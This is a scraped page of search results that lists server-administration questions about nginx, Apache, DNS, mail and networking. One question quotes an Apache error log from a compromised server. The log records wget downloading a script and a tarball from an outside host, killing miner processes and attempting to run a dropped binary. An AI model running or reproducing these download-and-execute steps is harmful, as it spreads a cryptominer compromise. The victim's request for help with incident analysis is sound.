Search Results

Search found 58625 results on 2345 pages for 'alex blyth@oracle com'.

Page 337/2345 | < Previous Page | 333 334 335 336 337 338 339 340 341 342 343 344  | Next Page >

  • Nginx: Loopback connection via PHP's getimagesize() crashes server (Magento's CMS)

    - by Alex
    We were able to trace a problem that is crashing our NGINX server running Magento down to the following point. Background info: the Magento backend has a CMS function with a WYSIWYG editor. This editor loads some pictures via a controller in Magento (cms/directive). When we set the NGINX error_log level to info, we get the following lines (line breaks inserted for better readability):

        2012/10/22 18:05:40 [info] 14105#0: *1 client closed prematurely connection,
        so upstream connection is closed too while sending request to upstream,
        client: XXXXXXXXX, server: test.local,
        request: "GET index.php/admin/cms_wysiwyg/directive/___directive/BASEENCODEDIMAGEURL,,/ HTTP/1.1",
        upstream: "fastcgi://127.0.0.1:9024", host: "test.local"

    When checking the code in the debugger, the following call in `Varien_Image_Adapter_Abstract::getMimeType()` never returns:

        # $this->_fileName is http://test.local/skin/adminhtml/base/default/images/demo-image-not-existing.gif
        # $_SERVER['REQUEST_URI'] = http://test.local/admin/cms_wysiwyg/directive/___directive/BASEENCODEDIMAGEURL
        list($this->_imageSrcWidth, $this->_imageSrcHeight, $this->_fileType, ) = getimagesize($this->_fileName);

    The requested filename is a URL pointing back to the same server that is running the script - a link to a static .gif that does not exist. Sample URL: http://test.local/skin/adminhtml/base/default/images/demo-image-not-existing.gif

    Once the line above executes, any subsequent request to the NGINX server no longer gets a response. After waiting around 10 minutes, the NGINX server starts answering requests again. I tried to reproduce the error with a simple test script that only calls getimagesize() with the given URL - but this does not crash. It simply leads to an exception saying that the URL could not be loaded (which is fine, as the URL is wrong).
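
    A minimal sketch of reproducing the loopback fetch outside Magento (the URL and the 5-second value are illustrative assumptions, not from the post). getimagesize() on a URL goes through PHP's HTTP stream wrapper, which honours default_socket_timeout, so capping that limits how long a FastCGI worker can be tied up by a request that loops back into its own pool - one common explanation for a server that goes silent for a while rather than crashing outright:

        <?php
        // Hypothetical standalone test, not Magento code. Requires allow_url_fopen=1.
        ini_set('default_socket_timeout', 5); // assumed value; PHP's default is 60s
        $url = 'http://test.local/skin/adminhtml/base/default/images/demo-image-not-existing.gif';
        $info = @getimagesize($url);          // false when the image cannot be fetched
        var_dump($info);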

    Read the article

  • NSD reply from unexpected source

    - by Ximik
    I have a server with NSD. There are MAIN_IP and ADD_IP. When I try to get the IP of my site from the server itself, I get the right output:

        dig @localhost my_site.com

    But when I try this from my PC, I get:

        dig @my_ns_server.com my_site.com
        ;; reply from unexpected source: MAIN_IP#53, expected ADD_IP#53

    (ADD_IP is the IP of my_ns_server.com.) What should I do? UPD: my interfaces config:

        auto eth2
        allow-hotplug eth2
        iface eth2 inet static
            address xxx.xxx.xxx.234
            netmask 255.255.255.252
            network xxx.xxx.xxx.232
            broadcast xxx.xxx.xxx.235
            gateway xxx.xxx.xxx.233
            dns-nameservers MY_ISP_IP
            dns-search MY_ISP_DOMAIN

        auto eth2:0
        iface eth2:0 inet static
            address xxx.xxx.xxx.124
            netmask 255.255.255.0

    xxx.xxx.xxx is the same for all IPs.
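
    A minimal sketch of the usual fix, assuming the zone should be served from ADD_IP and that nsd.conf lives in its default location (both assumptions, not stated in the question): binding NSD to the address clients actually query makes replies leave from that address instead of whatever the default route picks.

        # /etc/nsd/nsd.conf (path assumed)
        server:
            # Replace ADD_IP with the address my_ns_server.com resolves to.
            ip-address: ADD_IP

    NSD needs a restart afterwards so it re-binds its sockets.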

    Read the article

  • 404 with serving static files in a custom nginx configuration

    - by code90
    In my nginx configuration, I have the following:

        location /admin/ {
            alias /usr/share/php/wtlib_4/apps/admin/;

            location ~* .*\.php$ {
                try_files $uri $uri/ @php_admin;
            }

            location ~* \.(js|css|png|jpg|jpeg|gif|ico|pdf|zip|rar|air)$ {
                expires 7d;
                access_log off;
            }
        }

        location ~ ^/admin/modules/([^/]+)(.*\.(html|js|json|css|png|jpg|jpeg|gif|ico|pdf|zip|rar|air))$ {
            alias /usr/share/php/wtlib_4/modules/$1/admin/$2;
        }

        location ~ ^/admin/modules/([^/]+)(.*)$ {
            try_files $uri @php_admin_modules;
        }

        location @php_admin {
            if ($fastcgi_script_name ~ /admin(/.*\.php)$) {
                set $valid_fastcgi_script_name $1;
            }
            fastcgi_pass $byr_pass;
            fastcgi_index index.php;
            fastcgi_param SCRIPT_FILENAME /usr/share/php/wtlib_4/apps/admin$valid_fastcgi_script_name;
            fastcgi_param REDIRECT_STATUS 200;
            include /etc/nginx/fastcgi_params;
        }

        location @php_admin_modules {
            if ($fastcgi_script_name ~ /admin/modules/([^/]+)(.*)$) {
                set $byr_module $1;
                set $byr_rest $2;
            }
            fastcgi_pass $byr_pass;
            fastcgi_index index.php;
            fastcgi_param SCRIPT_FILENAME /usr/share/php/wtlib_4/modules/$byr_module/admin$byr_rest;
            fastcgi_param REDIRECT_STATUS 200;
            include /etc/nginx/fastcgi_params;
        }

    The following requested URL ends up with a 404:

        http://www.{domainname}.com/admin/modules/cms/styles/cms.css

    This is the error log:

        [error] 19551#0: *28 open() "/usr/share/php/wtlib_4/apps/admin/modules/cms/styles/cms.css" failed (2: No such file or directory), client: xxx.xxx.xxx.xxx, server: {domainname}.com, request: "GET /admin/modules/cms/styles/cms.css HTTP/1.1", host: "www.{domainname}.com"

    The following URLs work fine:

        http://www.{domainname}.com/admin/modules/store/?a=manage
        http://www.{domainname}.com/admin/modules/cms/?a=cms.load

    Can anyone see what the problem could be? Thanks. PS: I am trying to migrate existing sites from Apache to nginx.
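
    A sketch of one possible fix, under the assumption (consistent with the error log path) that the nested static-file regex inside "location /admin/" is the block capturing /admin/modules/... requests and resolving them against the admin alias. Nested regex locations are tried in order of appearance, so placing a more specific regex for module assets ahead of the generic one should let those requests use the modules path instead; directory layout is taken from the question:

        location /admin/ {
            alias /usr/share/php/wtlib_4/apps/admin/;

            # Module assets first, so they win over the generic static regex below.
            location ~* ^/admin/modules/([^/]+)(.*\.(html|js|json|css|png|jpg|jpeg|gif|ico|pdf|zip|rar|air))$ {
                alias /usr/share/php/wtlib_4/modules/$1/admin/$2;
                expires 7d;
                access_log off;
            }

            location ~* .*\.php$ {
                try_files $uri $uri/ @php_admin;
            }

            location ~* \.(js|css|png|jpg|jpeg|gif|ico|pdf|zip|rar|air)$ {
                expires 7d;
                access_log off;
            }
        }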

    Read the article

  • Wireless Access Point stopped working

    - by Alex Pritchard
    I have a simple LAN set up at home using a Linksys WRT54GSV4 as my primary router and an Encore ENHWI-2AN3 as an access point. I connect the Encore to the Linksys by running a cable from one of the Linksys LAN ports into the Encore WAN input. I originally configured this using the Encore setup wizard, setting the device up in AP Router mode. It detected the input network and worked about as expected, creating a second network that used my primary network to connect to the internet.

    It worked fine for about 2 weeks, then abruptly cut out today. I checked to make sure the network was still live through the cable going into the Encore (it provides internet when connected directly to a laptop) and that devices are still able to connect to the network being broadcast by the Encore. When I try to rerun the connection wizard on the Encore, I receive the message "No Services found in WAN port." The WAN settings are no longer retrieving a dynamic IP from the line. I tried providing a static IP, assigning an unused IP address within the subnet range of my primary router and pointing the default gateway to the Linksys IP, but this did not work either. When I plug the cable into the WAN port, an internet light comes on that is not lit when a live network is not connected.

    I've tried doing a hard reset on the Encore (held down the reset button until the lights flashed, reconfigured from scratch), but the WAN settings are still not detected. I also tried powering the modem, Linksys, and Encore off and on. Any suggestions would be appreciated!

    Read the article

  • Forums that compel one to read? [closed]

    - by Alex
    I want to create a forum for a very specific, somewhat fight-club-like area of information. The participants need to be unique, not people I know. To be precise, it needs to be an entirely random set of participants. To do this I am going on the assumption that whatever a potential viewer sees when he visits this particular domain he will be COMPELLED to go further. He feels an intense urge within him to read more. I need forum software that will evoke this feeling regardless of the content. Minimal and aesthetically fluid and functional. It must have.. zen.. What are my options?

    Read the article

  • Apache error log interpretation

    - by HTF
    It looks like someone gained access to my server. How can I find out which Apache vhost this log relates to? How are these commands from the log being invoked, and how/why are they printed to the log file - is this some remote shell or a PHP script?

    /var/log/httpd/error_log:

        mkdir: cannot create directory `/tmp/.kdso': File exists
        --2014-06-13 13:29:17--  http://updates.dyndn-web.com/abc.txt
        Resolving updates.dyndn-web.com... 94.23.49.91
        Connecting to updates.dyndn-web.com|94.23.49.91|:80... connected.
        HTTP request sent, awaiting response... 200 OK
        Length: 5055 (4.9K) [text/plain]
        Saving to: `abc.txt'
        0K ....  100%  303K=0.02s
        2014-06-13 13:29:17 (303 KB/s) - `abc.txt' saved [5055/5055]
          % Total % Received % Xferd Average Speed   Time   Time   Time  Current
                                     Dload  Upload   Total  Spent  Left  Speed
          0    0   0    0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
        101 5055 101 5055    0     0  79686      0 --:--:-- --:--:-- --:--:--  154k
        minerd64: no process killed
        minerd32: no process killed
        named: no process killed
        kernelupdates: no process killed
        kernelcfg: no process killed
        kernelorg: no process killed
        ls: cannot access /tmp/.ICE-unix: No such file or directory
        mkdir: cannot create directory `/tmp': File exists
        --2014-06-13 13:29:18--  http://updates.dyndn-web.com/64.tar.gz
        Resolving updates.dyndn-web.com... 94.23.49.91
        Connecting to updates.dyndn-web.com|94.23.49.91|:80... connected.
        HTTP request sent, awaiting response... 200 OK
        Length: 205812 (201K) [application/x-tar]
        Saving to: `64.tar.gz'
          0K .......... .......... .......... .......... .......... 24%  990K 0s
         50K .......... .......... .......... .......... .......... 49% 2.74M 0s
        100K .......... .......... .......... .......... .......... 74% 2.96M 0s
        150K .......... .......... .......... .......... .......... 99% 3.49M 0s
        200K                                                       100% 17.4M=0.1s
        2014-06-13 13:29:18 (1.99 MB/s) - `64.tar.gz' saved [205812/205812]
        sh: ./kernelupgrade: Permission denied
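
    A minimal sketch of how one might narrow this down, assuming per-vhost access logs under /var/log/httpd/ and that Apache runs as the apache user (both assumptions; adjust paths and user to the actual setup). The wget/pkill output typically lands in error_log because that file receives the stderr of processes spawned by Apache (CGI/PHP), so correlating the timestamps with access-log entries usually points at the vhost and script that were exploited:

        # Requests hitting PHP scripts around the time the commands appeared:
        grep "13/Jun/2014:13:2" /var/log/httpd/*access* | grep -Ei 'POST|\.php'

        # Files recently written by the web server user (dropped shells, miners):
        find /tmp /var/tmp /var/www -user apache -mmin -2880 -type f -ls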

    Read the article

  • Nginx server 301 Moved permanently

    - by user145714
    When I did a curl -v http://site-wordpress.com:81 I received this result:

        * About to connect() to site-wordpress.com port 81 (#0)
        *   Trying ip... connected
        * Connected to site-wordpress.com (ip) port 81 (#0)
        > GET / HTTP/1.1
        > User-Agent: curl/7.19.7 (x86_64-unknown-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.18 libssh2/1.2.2
        > Host: site-wordpress.com:81
        > Accept: */*
        < HTTP/1.1 301 Moved Permanently
        < Server: nginx/1.2.4
        < Date: Fri, 16 Nov 2012 16:28:19 GMT
        < Content-Type: text/html; charset=UTF-8
        < Transfer-Encoding: chunked
        < Connection: keep-alive
        < X-Pingback: The URL above/xmlrpc.php
        < Location: The URL above

    It seems like this line in my fastcgi_params is causing grief:

        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;

    If I remove this line, I get HTTP/1.1 200 OK, but I get a blank page. This is my config:

        server {
            listen 81;
            server_name site-wordpress.com;
            root /var/www/html/site;
            access_log /var/log/nginx/access.log;
            error_log /var/log/nginx/error.log;
            index index.php;

            if (!-e $request_filename){
                rewrite ^(.*)$ /index.php break;
            }

            location ~ \.php$ {
                fastcgi_pass 127.0.0.1:9000; # port where FastCGI processes were spawned
                fastcgi_index index.php;
                include /etc/nginx/fastcgi_params;
                include /etc/nginx/mime.types;
            }

            location ~ \.css {
                add_header Content-Type text/css;
            }

            location ~ \.js {
                add_header Content-Type application/x-javascript;
            }
        }

    This config works with the IP and port 80. But now I need to use a domain name and port 81, which doesn't work. Could someone please help. Thanks.
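
    A sketch of one likely cause, hedged: the X-Pingback header suggests the 301 is generated by WordPress itself rather than by nginx, and WordPress issues a canonical redirect whenever the requested host/port does not match its stored site URL. If that is the case here, making the stored URL include :81 should stop the redirect. The constants are standard WordPress configuration; the exact URL value is an assumption:

        <?php
        // wp-config.php (additions)
        define('WP_HOME',    'http://site-wordpress.com:81');
        define('WP_SITEURL', 'http://site-wordpress.com:81');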

    Read the article

  • Multiple SSL vhosts using wildcard certificate in nginx

    - by vvanscherpenseel
    I have two hostnames sharing the same domain name which I want to serve over HTTPS. I've got a wildcard SSL certificate and created two vhost configs.

    Host A:

        listen 127.0.0.1:443 ssl;
        server_name a.example.com;
        root /data/httpd/a.example.com;
        ssl_certificate /etc/ssl/wildcard.cer;
        ssl_certificate_key /etc/ssl/wildcard.key;

    Host B:

        listen 127.0.0.1:443 ssl;
        server_name b.example.com;
        root /data/httpd/b.example.com;
        ssl_certificate /etc/ssl/wildcard.cer;
        ssl_certificate_key /etc/ssl/wildcard.key;

    However, I get the same vhost served for either hostname.
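
    A minimal diagnostic sketch, assuming shell access to the box (hostnames as in the question). Name-based HTTPS vhosts rely on SNI, so it is worth confirming the running nginx was built with it and checking which vhost each name actually returns:

        # Prints "TLS SNI support enabled" if the binary supports it:
        nginx -V 2>&1 | grep -o 'TLS SNI support enabled'

        # Ask for each name explicitly (sending SNI) and compare the responses:
        curl -vk --resolve a.example.com:443:127.0.0.1 https://a.example.com/ -o /dev/null
        curl -vk --resolve b.example.com:443:127.0.0.1 https://b.example.com/ -o /dev/null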

    Read the article

  • Optimise Apache for EC2 micro instance

    - by Shiyu Sekam
    I'm running apache2 on an EC2 micro instance with ~600 MB RAM. The instance was running for almost a year without problems, but in the last weeks it just keeps crashing because the server reaches MaxClients. The server basically runs a few websites: one WordPress blog (not often used), the company website (most used) and 2 small sites which are just internal. The database for the blog runs on RDS, so there's no MySQL running on this web server.

    When I came to the company, the server was already set up and is running apache + mod_php + prefork. We want to migrate that in the future to nginx + php-fpm, but it still needs further testing, so for now I have to stick with the old setup. I also use CloudFlare DDoS protection in front of the server, because it was attacked a couple of times in the last weeks. My company doesn't want to pay for a better web server at this point, so I have to stick with the micro instance as well. Additionally, the code for the website we run is really bad and slow, and sometimes a single page load can take up to 15 seconds. The whole website is dynamic and written in PHP, so caching isn't really an option here. It's a customized search for users.

    I've already turned off KeepAlive, which improved the performance a little bit. My prefork config looks like the following:

        StartServers          2
        MinSpareServers       2
        MaxSpareServers       5
        ServerLimit          10
        MaxClients           10
        MaxRequestsPerChild 100

    The server just becomes unresponsive after running for a while, and I've run the following command to see how many connections there are:

        netstat | grep http | wc -l
        75

    Trying to restart apache helps for a short moment, but after a while the apache processes become unresponsive again. I have the following modules enabled (output of apache2ctl -M):

        Loaded Modules:
         core_module (static)
         log_config_module (static)
         logio_module (static)
         version_module (static)
         mpm_prefork_module (static)
         http_module (static)
         so_module (static)
         alias_module (shared)
         authz_host_module (shared)
         deflate_module (shared)
         dir_module (shared)
         expires_module (shared)
         mime_module (shared)
         negotiation_module (shared)
         php5_module (shared)
         rewrite_module (shared)
         setenvif_module (shared)
         ssl_module (shared)
         status_module (shared)
        Syntax OK

    apache2.conf:

        # Security
        ServerTokens OS
        ServerSignature On
        TraceEnable On

        ServerName "web.example.com"
        ServerRoot "/etc/apache2"
        PidFile ${APACHE_PID_FILE}
        Timeout 30
        KeepAlive off

        User www-data
        Group www-data

        AccessFileName .htaccess
        <Files ~ "^\.ht">
            Order allow,deny
            Deny from all
            Satisfy all
        </Files>

        <Directory />
            Options FollowSymLinks
            AllowOverride None
        </Directory>

        DefaultType none
        HostnameLookups Off

        ErrorLog /var/log/apache2/error.log
        LogLevel warn
        EnableSendfile On

        #Listen 80
        Include /etc/apache2/mods-enabled/*.load
        Include /etc/apache2/mods-enabled/*.conf
        Include /etc/apache2/ports.conf

        LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
        LogFormat "%h %l %u %t \"%r\" %>s %b" common
        LogFormat "%{Referer}i -> %U" referer
        LogFormat "%{User-agent}i" agent

        Include /etc/apache2/conf.d/*.conf
        Include /etc/apache2/sites-enabled/*.conf

    Vhost of the main site:

        <VirtualHost *:80>
            ServerName www.example.com

            ## Vhost docroot
            DocumentRoot /srv/www/jenkins/Web

            ## Directories, there should at least be a declaration for /srv/www/jenkins/Web
            <Directory /srv/www/jenkins/Web>
                AllowOverride All
                Order allow,deny
                Allow from all
            </Directory>

            ## Load additional static includes

            ## Logging
            ErrorLog /var/log/apache2/www.example.com.error.log
            LogLevel warn
            ServerSignature Off
            CustomLog /var/log/apache2/www.example.com.access.log combined

            ## Rewrite rules
            RewriteEngine On
            RewriteCond %{HTTP_HOST} !^www.example.com$
            RewriteRule ^.*$ http://www.example.com%{REQUEST_URI} [R=301,L]

            ## Server aliases
            ServerAlias www.example.invalid
            ServerAlias example.com

            ## Custom fragment
            <Location /srv/www/jenkins/Web/library>
                Order Deny,Allow
                Deny from all
            </Location>

            <Files ~ "^\.(.+)">
                Order deny,allow
                deny from all
            </Files>
        </VirtualHost>
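
    A minimal sizing sketch, with assumed numbers (nothing below comes from the question). With prefork + mod_php, MaxClients is roughly the RAM available to Apache divided by the resident size of one child, so measuring the children on the live box gives a defensible value for a ~600 MB instance:

        # Average resident size of the current Apache children, in KB:
        ps -ylC apache2 --sort=rss | awk 'NR>1 {sum+=$8; n++} END {if (n) print "avg RSS (KB):", sum/n}'

        # If each child averages ~40 MB and ~400 MB is left for Apache,
        # MaxClients around 10 is already the right order of magnitude;
        # the 15-second page loads, not the limit itself, are what exhaust the slots.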

    Read the article

  • Why doesn't postfix use my smtp_generic_maps?

    - by RichardTheKiwi
    What have I set up incorrectly?

        > postconf -n
        ....
        smtp_generic_maps = regexp:/etc/postfix/rewrite
        ....

        > cat /etc/postfix/rewrite
        /.*/    removed+postfix@gmail.com

        > echo "test" | mail -s "test" tester2@mailinator.com

        > tail -f /var/log/mail.log
        Dec  8 05:56:01 xxxxxxxxxxxx postfix/pickup[20227]: E9272709284: uid=501 from=<yyyy>
        Dec  8 05:56:01 xxxxxxxxxxxx postfix/cleanup[20270]: E9272709284: message-id=<[email protected]>
        Dec  8 05:56:01 xxxxxxxxxxxx postfix/qmgr[20228]: E9272709284: from=<[email protected]>, size=331, nrcpt=1 (queue active)
        Dec  8 05:56:03 xxxxxxxxxxxx postfix/smtp[20272]: E9272709284: to=<[email protected]>, relay=mailinator.com[72.51.33.80]:25, delay=1.1, delays=0.02/0.01/0.48/0.58, dsn=2.0.0, status=sent (250 Ok)

    FYI, I have reloaded postfix many times:

        sudo postfix reload

    Note: This is on OSX 10.7.5.
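
    A small diagnostic sketch, assuming shell access to the same box (the test address is made up). postmap -q evaluates a lookup table the same way Postfix does, so it shows whether the regexp table matches at all; note that the generic(5) mapping applies to addresses generally on outgoing SMTP (not just the sender), so a catch-all /.*/ pattern has a wider effect than rewriting From:

        # Should print removed+postfix@gmail.com if the regexp table is being read:
        postmap -q "someone@example.org" regexp:/etc/postfix/rewrite

        # Confirm the running daemon actually sees the setting:
        postconf smtp_generic_maps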

    Read the article

  • How to configure a static wildcard subdomain with dnsmasq.

    - by Prody
    I have a network behind a NAT with a few machines. The machines are:

      - router - NAT, dnsmasq, forwarding - directly connected to the inet
      - server - which runs ssh, www and some other stuff
      - clients - which do stuff on the server

    I also have mydomain.com. server.mydomain.com points to my connection's IP (a single IP), which is the router, which forwards ports to the server. The server has an httpd running which serves different sites based on vhosts, so I have site1.server.mydomain.com, site2... The problem is that all the traffic goes through the router, and when I check the logs I always see the router's IP for everything (so it's hard to see who is running the script with the while(1)). I would just ServerAlias site1.server.local, but most of the sites have a root URL saved somewhere on top of which other URLs are built, so I can't do that. The solution for me would be telling dnsmasq somehow to answer *.mydomain.com with the server's IP. Is this possible somehow?
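
    A minimal sketch of the dnsmasq side, assuming the server's LAN address is 192.168.1.10 (a made-up value for the example). dnsmasq's address= option matches the named domain and everything under it, so a single line answers mydomain.com and every *.mydomain.com query with the server's address for LAN clients:

        # /etc/dnsmasq.conf on the router
        address=/mydomain.com/192.168.1.10

    If only the vhost names should be caught, narrowing it to address=/server.mydomain.com/192.168.1.10 leaves the rest of mydomain.com resolving normally.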

    Read the article

  • How to set local alias for a machine?

    - by Alex G.
    I would like to set an alias on my local PC for a network machine. I know that it can be done by adding an entry in the hosts file as long as the IP address of the machine is also specified. However, the problem is that IPs are dynamically assigned by a DHCP server so I don't know for sure the IP address. Is there a way to define just an alias based on the machine's network name? P.S.: I'm running Windows Server 2008 R2.
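
    A sketch of one alternative, hedged: the hosts file cannot map a name to another name, but a DNS CNAME can, and it keeps tracking the target machine's dynamically registered A record. This assumes an AD/DNS zone (here called corp.local, a placeholder) and admin rights on the DNS server, neither of which is stated in the question:

        rem Names below are placeholders; run with DNS admin rights.
        dnscmd DnsServerName /RecordAdd corp.local myalias CNAME targetmachine.corp.local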

    Read the article

  • Lazy Linux backup system?

    - by Alex
    Ok, so I want to say Time Machine, but that's not exactly what I'm looking for. I want to set up a system that will regularly (hourly?) back up the /home directory of our machine. Time Machine-style things are naturally preferable since they save space by only saving the changes, but honestly, this is important enough that I can suffer some waste. Any ideas?
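
    A minimal sketch of one common approach, with an assumed destination path and schedule (not from the question). rsync with --link-dest produces Time Machine-like snapshots: files that did not change are hard links into the previous snapshot, so each hourly run only costs the space of what changed; rsnapshot packages the same idea if rolling it by hand is unappealing:

        #!/bin/sh
        # Run hourly from cron, e.g.: 0 * * * * /usr/local/bin/home-snapshot.sh
        snap=/backup/$(date +%Y-%m-%d_%H%M)
        rsync -a --delete --link-dest=/backup/latest /home/ "$snap"
        ln -sfn "$snap" /backup/latest   # the next run links against this snapshot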

    Read the article

  • Soft links between samba profile and profile.V2

    - by Alex Rose
    I am currently using a Samba server to host Windows sessions. For the moment, every machine runs Windows XP, but in an upcoming hardware upgrade I will have new Windows 7 machines installed. The problem is that the user directory layout changed from XP to 7 (for instance 'My Documents' became 'Documents'). To solve that, Samba created a folder called profile.V2, which contains the files and folders for Windows 7. Now I would like to link the two profile folders ('profile' from Windows XP, 'profile.V2' from Windows 7) so that a user can log on from an XP or 7 machine and still have access to the same files. I tried to create soft links between folder pairs ('Documents' - 'My Documents') and it seems to work. My question is: is it likely to create issues in the future?

    Read the article

  • Why is the page automatically redirecting to other sites?

    - by raj
    In my browser (Firefox 10.0.7) the page automatically redirects to other sites without my clicking any link. If I enter the superuser.com URL and press Enter, it redirects to some other site; sometimes the page also redirects while refreshing. It's redirecting to these sites:

        http://result.seenfind.com/ncp/Default.aspx?term=gatlinburg%20cabin&u=1000670913
        http://search.cpvee.com/search.php?q=gatlinburg+cabin&y=&f=2168&s=
        http://www.insidecelebritygossip.com/

    I cleared all history and everything, but I still have the same problem. I am using CentOS 6.3.

    Read the article

  • Serving static content with Apache web server and Tomcat

    - by Hunter
    I've configured Apache web server and Tomcat like this. I created a new file in apache2/sites-available, named it "myDomain", with this content:

        <VirtualHost *:80>
            ServerAdmin admin@myDomain.com
            ServerName myDomain.com
            ServerAlias www.myDomain.com
            ProxyPass / ajp://localhost:8009
            <Proxy *>
                AllowOverride AuthConfig
                Order allow,deny
                Allow from all
                Options -Indexes
            </Proxy>
        </VirtualHost>

    Then I enabled mod_proxy and the myDomain site:

        a2enmod proxy_ajp
        a2ensite myDomain

    And edited Tomcat's server.xml (inside the Engine tag):

        <Host name="myDomain.com" appBase="webapps/myApp">
            <Context path="" docBase="."/>
        </Host>
        <Host name="www.myDomain.com" appBase="webapps/myApp">
            <Context path="" docBase="."/>
        </Host>

    This works great. But I don't want to put static files (html, images, videos etc.) into subfolders of {tomcat home}/webapps/myApp; instead I'd like to put them in subdirectories of the Apache web server's root WWW directory, and I'd like Apache to serve these files alone. How could I do this, so that all incoming requests are forwarded to Tomcat except those that ask for a static file?
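
    A minimal sketch of one way to do this, with assumed paths (/var/www/myDomain/static is not from the question). A "ProxyPass <path> !" exclusion must appear before the catch-all ProxyPass and tells mod_proxy to leave that path alone, so Apache serves it straight from disk while everything else still goes to Tomcat over AJP:

        <VirtualHost *:80>
            ServerName myDomain.com
            ServerAlias www.myDomain.com
            DocumentRoot /var/www/myDomain

            # Static content served by Apache itself (path is an example):
            Alias /static /var/www/myDomain/static
            ProxyPass /static !

            # Everything else is forwarded to Tomcat:
            ProxyPass / ajp://localhost:8009/
            ProxyPassReverse / ajp://localhost:8009/
        </VirtualHost>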

    Read the article

  • Is email forwarding to the sender's address usually blocked in Mail servers / MTA?

    - by codecowboy
    I've noticed that email forwarding to an address seems not to work if I send the email from the address to which the mail is being forwarded. This happens with GMail and Fasthosts mail servers. For example: I send an email to info@mail.com from myaddress@mail.com, info@mail.com is set to forward to myaddress@mail.com, and the email never arrives. I realise this seems logical, but it is a potential cause of confusion when testing email functionality in a web application (for me, anyway ;-). I would just like to know if this is standard for all MTA software so I can avoid confusing myself.

    Read the article

  • Apache mod_proxy

    - by mhouston100
    Uggh, I'm spewing that I can't figure this out, I'm so frustrated:

        <VirtualHost *:80>
            servername domain1.com.au
            ServerAdmin webmaster@localhost
            DocumentRoot /var/www/html

            ErrorLog ${APACHE_LOG_DIR}/error.log
            CustomLog ${APACHE_LOG_DIR}/access.log combined

            <Proxy *>
                Order Allow,Deny
                Allow from all
            </Proxy>

            RewriteEngine on
            ReWriteCond %{SERVER_PORT} !^443$
            RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [NC,R,L]
        </VirtualHost>

        <VirtualHost *:443>
            servername domain1.com.au
            SSLEngine on
            SSLCertificateFile /etc/apache2/ssl/owncloud.pem
            SSLCertificateKeyFile /etc/apache2/ssl/owncloud.key
            DocumentRoot /var/www/html
        </VirtualHost>

        <VirtualHost *:*>
            Servername domain2.com.au
            ProxyRequests Off
            <Proxy *>
                Order deny,allow
                Allow from all
            </Proxy>
            ProxyPass / https://192.168.1.12/
            ProxyPassReverse / https://192.168.1.12/
        </VirtualHost>

    Not sure if it's clear what I'm trying to do, but I've read and read and READ, and I still can't figure it out. Basically I have a working Apache server with a rewrite to force HTTPS, as seen in the first two VirtualHost entries. I now have a webmail service I set up on another server, under another domain name, but I only have one incoming public IP address. So I'm trying to have any incoming requests for the second domain proxied to the other server to access the webmail, whether it's port 80 or 443. IMAP and POP3 are no problem, I can just forward the ports directly to the correct server. The result of the above configuration is that requests to domain2.com.au (port 80 or 443) are forwarded to https://domain1.com.au. Am I headed in the right direction?
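
    A sketch of how the second domain is often handled, under the assumption that a certificate for domain2.com.au is available on this box (the file names below are placeholders). Apache matches name-based vhosts per port, so the wildcard *:* block is usually better split into a *:80 and a *:443 VirtualHost with ServerName domain2.com.au; proxying to an HTTPS backend additionally needs SSLProxyEngine:

        <VirtualHost *:80>
            ServerName domain2.com.au
            ProxyRequests Off
            ProxyPreserveHost On
            SSLProxyEngine on
            ProxyPass        / https://192.168.1.12/
            ProxyPassReverse / https://192.168.1.12/
        </VirtualHost>

        <VirtualHost *:443>
            ServerName domain2.com.au
            SSLEngine on
            SSLCertificateFile    /etc/apache2/ssl/domain2.pem   # placeholder paths
            SSLCertificateKeyFile /etc/apache2/ssl/domain2.key
            ProxyRequests Off
            ProxyPreserveHost On
            SSLProxyEngine on
            ProxyPass        / https://192.168.1.12/
            ProxyPassReverse / https://192.168.1.12/
        </VirtualHost>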

    Read the article

  • Windows 7 RDP Problem - connecting to external zone with computer names

    - by alex
    I recently installed Windows 7, and all is well so far, apart from using RDP to access computers outside my domain. We use a datacenter that is outside of our domain. I was using Windows Vista before (not sure if this is relevant) and I could RDP to the machines with no problem, using their machine names (Web10, for example).

      - I have changed my IP address to be the same as it was when I was using Vista.
      - We use a DrayTek firewall - we use DMZ Host to map my IP to an external IP which is allowed to access the datacenter.
      - I've disabled Windows Firewall.

    When I try to connect in the Remote Desktop client using Web10, I can't connect; however, if I enter the actual IP address, I can. I have run out of ideas... any help is appreciated!
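
    A small workaround sketch, hedged: if the short names simply no longer resolve from the new install, a hosts entry (or adding the datacenter's DNS suffix to the connection's search list) lets the old "connect by machine name" habit keep working. The address below is a placeholder, not Web10's real IP:

        rem Run from an elevated command prompt; 203.0.113.10 is a placeholder.
        echo 203.0.113.10  Web10 >> %SystemRoot%\System32\drivers\etc\hosts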

    Read the article

  • How do I host multiple domains on Ubuntu Server (Hardy Heron)?

    - by markle976
    I am trying to figure out the best way to host multiple domains on my Ubuntu server. I have tried multiple options, but I can't get everything to work the way I want it to. I want to be able to add domains without having to restart Apache each time. I tried using mod_vhost_alias (see below), but that maps www.domain.com and domain.com to different folders. I also need to be able to use mod_rewrite to map requests for domain.com/app/* to domain.com/somescript.php.

    Current httpd.conf:

        UseCanonicalName Off
        VirtualDocumentRoot /var/www/%0

    Any thoughts?
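
    A minimal sketch of one way to keep a single directory per domain, assuming the document roots are named after the bare domain (e.g. /var/www/domain.com) - that naming, the redirect choice and the /app/ rule are assumptions, not from the question. A server-wide rewrite collapses www.* onto the bare name before mod_vhost_alias maps the hostname, so both spellings land in the same folder, and new domains still only need a directory plus DNS, no Apache restart:

        UseCanonicalName Off
        RewriteEngine On

        # Redirect www.domain.com to domain.com (301), then map by hostname:
        RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC]
        RewriteRule ^ http://%1%{REQUEST_URI} [R=301,L]

        VirtualDocumentRoot /var/www/%0

        # Hypothetical /app/* front-controller mapping mentioned in the question:
        RewriteRule ^/app/ /somescript.php [PT,L]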

    Read the article

  • Set Thunderbird "from" address by incoming "to" address

    - by user293698
    I have configured my email server to catch all email to my mailbox, so x@mydomain.com and y@mydomain.com go to one mailbox. Every forum, registration and person gets their own address for sending me email, so I can deliver it to /dev/null if anyone starts spamming. That's the working setup. Now the problem: if I reply to a message, Thunderbird always sets my default identity as the sender. I know I can add additional identities, but I don't want to add every address. How can I configure Thunderbird so that when an email is sent to x@mydomain.com, I answer from x@mydomain.com?

    Read the article

